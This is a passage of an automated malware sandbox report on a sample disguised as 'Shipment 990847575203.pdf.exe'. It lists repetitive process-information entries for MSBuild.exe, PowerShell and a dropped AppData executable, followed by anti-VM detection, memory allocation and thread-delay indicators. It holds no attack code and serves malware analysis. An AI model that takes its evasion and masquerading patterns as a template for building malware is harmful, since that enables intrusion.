                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: Shipment 990847575203.pdf.exe PID: 5192, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory allocated: 17F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory allocated: 32C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory allocated: 52C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory allocated: 94C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory allocated: A4C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory allocated: A6D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeMemory allocated: B6D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: CB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2820000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory allocated: 14E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory allocated: 32E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory allocated: 1640000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory allocated: 8EE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory allocated: 9EE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory allocated: A0D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exeMemory allocated: B0D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2EB0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3080000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 5080000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599016Jump to behavior
